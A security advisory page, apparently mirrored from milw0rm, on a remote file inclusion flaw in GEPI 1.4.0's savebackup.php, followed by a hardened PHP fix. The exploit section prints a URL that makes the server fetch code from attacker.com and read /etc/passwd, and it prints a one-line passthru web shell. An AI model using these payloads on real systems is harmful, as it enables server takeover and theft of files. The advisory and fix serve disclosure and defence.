Information Security



Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion

  HITWEB Remote File Include

  Clanlite Remote File Include

  jamroom Remote File Include

From: MILW0RM <submit_(at)_milw0rm.com>
Date: October 31, 2006
Subject: GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
     include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat /etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]
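
The unchecked `include($_GET['filename'])` above next to a hardened lookup, as an added example that is not GEPI's code or its actual fix. It assumes the parameter is only ever meant to name a local file in one fixed directory; `resolve_local_file()`, the temp directory and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not GEPI code. The vulnerable pattern from the advisory is:
//     include($_GET['filename']);
// Hypothetical replacement: resolve the request to a file inside one fixed
// directory, or refuse it.

function resolve_local_file(string $requested, string $baseDir): ?string
{
    // Bare file name only. The character class has no ':' or '/' (or '\'),
    // so URL wrappers (http://, ftp://, php://) and path traversal are
    // rejected before any filesystem call. \z blocks a trailing newline.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_.\-]*\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Containment check: the resolved path must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed demo data: a temp directory with one legitimate file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'backup_2006.sql', "-- constructed sample\n");

$samples = [
    'backup_2006.sql',               // legitimate local name
    'http://attacker.com/test.txt',  // value used in the advisory
    '../../etc/passwd',              // traversal attempt
    'php://input',                   // stream wrapper
    'missing.sql',                   // well-formed but nonexistent
];
foreach ($samples as $s) {
    $path = resolve_local_file($s, $dir);
    printf("%-30s => %s\n", $s, $path === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'backup_2006.sql');
rmdir($dir);
```

Independently of the code fix, setting `allow_url_include = Off` in php.ini (available from PHP 5.2.0) stops `include` from fetching remote URLs at all.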

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod